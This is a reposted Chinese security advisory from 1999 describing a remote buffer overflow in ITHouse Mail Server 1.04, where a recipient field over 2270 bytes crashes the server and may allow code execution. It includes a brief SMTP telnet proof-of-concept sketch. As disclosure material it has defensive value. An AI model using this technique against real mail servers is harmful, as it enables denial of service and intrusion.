ITHouse Mail Server 1.04远程溢出漏洞
|
|
| 文章来源:linuxdby.com 编辑: 发布时间:2007-11-20
|
发布时间:1999-12-01
更新时间:1999-12-01
严重程度:中
威胁程度:远程拒绝服务
错误类型:输入验证错误
利用方式:服务器模式
受影响系统
ITHouse Mail Server v1.04
详细描述
ITHouse mail server 1.04 存在一个远程溢出漏洞。攻击者会构造一封特殊的email,Email的 "收信人"字段中包含多于2270字节的数据,这把导致ITHouse mail服务器溢出,并可能执行任意代码。
测试代码
$ telnet ithouse.mail.com 25
HELO example.org
MAIL FROM:example@example.org
RCPT TO: + EIP
DATA .
QUIT
当Mail server发送这封邮件时把会发生溢出并崩溃。
解决方案
尚无
相关信息
Tags:溢出 漏洞 远程 ITHouse mail 服务器 server 时间 代码
|
|
| 上一篇: LINUX操作系统下的网络邮件安全问题 下一篇: 用Win 2003架设邮件服务器 |
| 【返回顶部】 【打印】 【大】 【中】 【小】 【关闭】 |
